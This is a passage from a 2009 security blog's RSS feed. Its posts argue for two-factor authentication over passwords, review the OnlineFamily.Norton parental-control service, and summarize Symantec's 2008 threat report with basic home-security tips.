<p>My question is this:  How many passwords have to be compromised before we all finally come to the consensus that passwords are a really bad idea?</p>
<p>There are three ways to authenticate someone:</p>
<ul>
<li>Something they know (a password);</li>
<li>Something they have (a physical device); and,</li>
<li>Something they are (biometrics).</li>
</ul>
<p>Each of these &#8216;three ways&#8217; is called a factor. If you want to ensure that someone is who they say they are, simply use two of the above factors for strong authentication. For example, have the person type in a password and something else, like insert a smart card or type in a 6 digit number that proves they have a specific piece of hardware with them.</p>
<p>The problem with passwords is threefold:</p>
<ol>
<li>Passwords alone are single factor authentication, and by definition that authentication is weak.</li>
<li>We let users choose their own passwords, thereby increasing the likelihood that others can figure out the password.</li>
<li>Since people forget passwords, we build mechanisms to let them find out their password or reset it.</li>
</ol>
<p>In other words, we take a weak authentication mechanism and make it worse. And then we act surprised when it fails.</p>
<p>For years we’ve been telling people to choose complex passwords that can’t easily be guessed.  But most people don’t follow that advice.  And even those who do may be subject to attack because of the poor authentication used to reset passwords.  A good authentication mechanism should not allow each user to determine the strength of authentication.</p>
<p>Effective alternatives are available.  Among them are key-chain size authentication tokens from RSA and Vasco.  In summary, as part of your login to a site you have to type in the 6 digit number that appears on the device, as well as your username and password (or a PIN).</p>
<p>While it’s easy to understand that Twitter may not want to provide users with authentication tokens (it is a free service after all!), at minimum they could, and should, require two-factor authentication for all users with administrative access.  The amount of damage that could result from an intrusion into a Twitter administration account warrants two-factor authentication.  If Twitter had conducted a risk assessment they would know that.</p>
<p>Security professionals have been pointing out these exact problems with passwords for years.  Is anybody listening?</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/05/04/passwords-%e2%80%93-when-will-we-ever-learn/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OnlineFamily.Norton: Setting the House Rules</title>
		<link>http://jacksch.com/2009/04/27/onlinefamilynorton-setting-the-house-rules/</link>
		<comments>http://jacksch.com/2009/04/27/onlinefamilynorton-setting-the-house-rules/#comments</comments>
		<pubDate>Mon, 27 Apr 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Children]]></category>
		<category><![CDATA[Products]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3504</guid>
		<description><![CDATA[When it comes to children and the Internet, there is no substitute for parental supervision. It’s certainly not wrong to use parental control software, but parents must understand that software is intended to assist, not do their job for them. The problem is that many vendors don’t seem to appreciate the difference. Thanks to Norton, [...]]]></description>
			<content:encoded><![CDATA[
<p>When it comes to children and the Internet, there is no substitute for parental supervision. It’s certainly not wrong to use parental control software, but parents must understand that software is intended to assist, not do their job for them. The problem is that many vendors don’t seem to appreciate the difference. Thanks to Norton, that’s changing with today&#8217;s launch of the OnlineFamily.Norton service.</p>
<p><a href="http://techlifepost.com/wp-content/uploads/image.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" src="http://techlifepost.com/wp-content/uploads/image-thumb.png" border="0" alt="image" width="400" height="368" /></a></p>
<p>According to Jody Gibney, Group Product Manager of OnlineFamily.Norton, many parents don’t understand what their children are doing online and only about 20% of parents with kids aged 6-18 use technology to help.</p>
<p>It should be no surprise to parents that kids do a lot online:</p>
<ul>
<li>They consume, create, and share web content.</li>
<li>They socialize one-on-one and in groups.</li>
<li>Kids who use social media have an average of 145 online friends.</li>
<li>They often have multiple complex online identities.</li>
</ul>
<p>It’s no surprise that parents have a hard time keeping up.</p>
<p>Parents also may not realize where the real dangers lie.  While pedophiles have lured children across the Internet, such occurrences are very rare. Much more common is, as Jody put it, “plain kid-on-kid meanness.”  Social media sites allow kids to post hurtful words, images and videos that can result in real-world embarrassment. Parents need to know what sites their kids are using and decide if and how they should monitor it. Rather than simply prohibiting access to sites, Jody suggests that parents negotiate age-appropriate solutions with children.  For example, a teen may be allowed to use Facebook on the condition that they ‘friend’ Mom so that she can see what is being posted.  If the child sets up a second Facebook account, it’s important that Mom have a way of finding out about it.</p>
<p><a href="http://techlifepost.com/wp-content/uploads/image1.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" src="http://techlifepost.com/wp-content/uploads/image-thumb1.png" border="0" alt="image" width="400" height="241" /></a></p>
<p>Some elements of Norton’s approach, like categorizing web sites and reporting on use, are similar to other products, but their philosophy is different.  Norton&#8217;s service is designed to encourage dialog and negotiation between parents and children. For example, Norton encourages parents to log in to OnlineFamily’s web-based interface with their children and discuss the various choices and options. The selections made for each child become “house rules” and include web site categories as well as rules relating to the use of instant messaging, what times the Internet can be used, for how long, and what happens when rules are violated.</p>
<p>Most rules and limits can be configured as hard or soft. Hard time limits log the child out after giving a 15 minute warning, while soft time limits simply report the activity. Similarly three options exist for web sites: Monitor use but don’t block, warn the child first but let them proceed to blocked sites, or actively block access to sites that violate the house rules.</p>
<p>Norton’s approach, Jody explained, is to “understand intent, guide online behavior and discuss online activities.” When a web site is blocked, OnlineFamily gives the child options that include “Oops, I made a mistake! Let me go back.” and “I want to tell my parents why I tried to go to this Web site.” There is also an option to dispute the categorization of the site. When a child researching a homework assignment is prevented from accessing a site, he or she can explain why they want access and the request is sent to parents in real-time.</p>
<p>I’m often concerned about the ethical implications of monitoring software and I believe that spying on family members can erode trust and damage relationships. OnlineFamily avoids that issue completely. Not only does it display a notification every time the child logs on, but the child can also click on the application’s icon and display a summary of house rules, including information on what types of activity is being monitored.</p>
<p><a href="http://techlifepost.com/wp-content/uploads/image2.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" src="http://techlifepost.com/wp-content/uploads/image-thumb2.png" border="0" alt="image" width="400" height="346" /></a></p>
<p>Last week I created an account on <a href="http://OnlineFamily.Norton.com" target="_blank">OnlineFamily.Norton.com</a> while it was still in beta. I downloaded the program and installed it on our family computer. Then I logged into the OnlineFamily web site, added my daughter as a family member, identified which computer account she used and sent an invite to my wife giving her ‘parent’ access. Next I set the rules and explained the system to my daughter.  Overall, I’m impressed. I did run into a few rough edges with the beta, but by the time you read this they will have been fixed.</p>
<p>OnlineFamily.Norton is the first product in this space to actively involve parents and that makes it a winner. It officially launches today at <a href="http://Onlinefamily.Norton.com">http://Onlinefamily.Norton.com</a> and is free until January 1, 2010. Norton hopes to receive feedback from parents and says it will consider that feedback carefully before deciding on the future pricing model.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/04/27/onlinefamilynorton-setting-the-house-rules/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Internet Security and Web Apps</title>
		<link>http://jacksch.com/2009/04/20/internet-security-and-web-apps/</link>
		<comments>http://jacksch.com/2009/04/20/internet-security-and-web-apps/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 11:00:34 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3485</guid>
		<description><![CDATA[Last week Symantec released their 2008 Internet Security Threat Report (ISTR).  The report provides an analysis of worldwide Internet threat activity, vulnerabilities, malicious code, phishing, spam and activity on underground economy servers. The ISTR contains a lot of interesting information and I’d encourage you to read it &#8212; I’m certainly not going to repeat all [...]]]></description>
			<content:encoded><![CDATA[
<p>Last week Symantec released their <a href="http://www.symantec.com/business/theme.jsp?themeid=threatreport&amp;inid=us_ghp_promo_hero1_istr" target="_blank">2008 Internet Security Threat Report (ISTR)</a>.  The report provides an analysis of worldwide Internet threat activity, vulnerabilities, malicious code, phishing, spam and activity on underground economy servers.</p>
<p>The ISTR contains a lot of interesting information and I’d encourage you to read it &#8212; I’m certainly not going to repeat all the findings here.  But if you’re an average Internet user wondering what&#8217;s going on, here is my greatly oversimplified summary:</p>
<p><strong>Criminal activity on the Internet continues to increase.  Criminals are targeting your personal information, especially your credit cards and logins to your financial institution. They’re doing so mostly by compromising the web sites you visit and installing nasty stuff that downloads to your computer.</strong></p>
<p>There are a lot of things you could do to protect yourself.  But the real question isn’t what you could do, it’s what should you do.  Here are my top five recommendations:</p>
<ol>
<li>Ensure your anti-virus software is up-to-date.  If you don’t have an AV package, get one; reasonable choices include AVG, BitDefender, Kaspersky, McAfee, Nod32, or Norton/Symantec.  (In alphabetical order if you’re wondering.)  </li>
<li>Update your operating system and unless you have a very good reason not to, set it to update automatically.  A lot of systems are being compromised even though a fix was issued more than 6 months ago.</li>
<li>Back up data you don’t want to live without. Use removable media (CD, DVD, USB Flash drive, USB Hard drive) or an automatic Internet backup service like Carbonite.</li>
<li>Avoid the darker side of the Internet like gambling, porn, pirated software, illegally distributed movies, etc. They&#8217;re a haven for malware.</li>
<li>Don’t let your kids play on your work computer.</li>
</ol>
<p>The vast majority of intrusions into personal computers are preventable.  Following these five simple recommendations dramatically reduces your risks.</p>
<p>For business readers, here’s an excerpt from the ISTR:</p>
<blockquote><p>“Web-based attacks are now the primary vector for malicious activity over the Internet. The continued growth of the Internet and the number of people increasingly using it for an extensive array of activities presents attackers with a growing range of targets as well as various means to launch malicious activity. Within this activity, Symantec has noted that most Web-based attacks are launched against users who visit legitimate websites that have been compromised by attackers in order to serve malicious content. Some of the common techniques used by attackers to compromise a website include exploiting a vulnerable Web application running on the server (by attacking through improperly secured input fields), or exploiting some vulnerability present in the underlying host operating system.”</p></blockquote>
<p>Sixty-three percent of vulnerabilities documented by Symantec in 2008 affected Web applications. The message to web application developers is clear: Many of you are not paying sufficient attention to security. As a profession, you are failing your customers.</p>
<p>I realize that’s a harsh statement and that in many cases web developers are responding to downward pressures on price and unrealistically short development timeframes.  But as a profession it’s time to step up to the security challenge and start designing web applications that resist and even tolerate some intrusions while still protecting sensitive information and users. Those users, after all, are your customer&#8217;s customers.</p>
<p>We must start paying more attention to security throughout the software development lifecycle.  That includes ensuring security requirements are identified along with other functional requirements for new applications.  In fact one of the problems is that we still consider security requirements somehow separate from ‘functional’ or ‘business’ requirements.  They&#8217;re not.</p>
<p>Perhaps this is one space where the open source community could play an important role.  Most web applications have common requirements like user account maintenance, authentication, privilege management, session control and input validation. Yet every application developer seems to create their own, and many make the same mistakes. Perhaps it is time for an open web application framework that handles these critical functions&#8230;and does it right.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/04/20/internet-security-and-web-apps/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
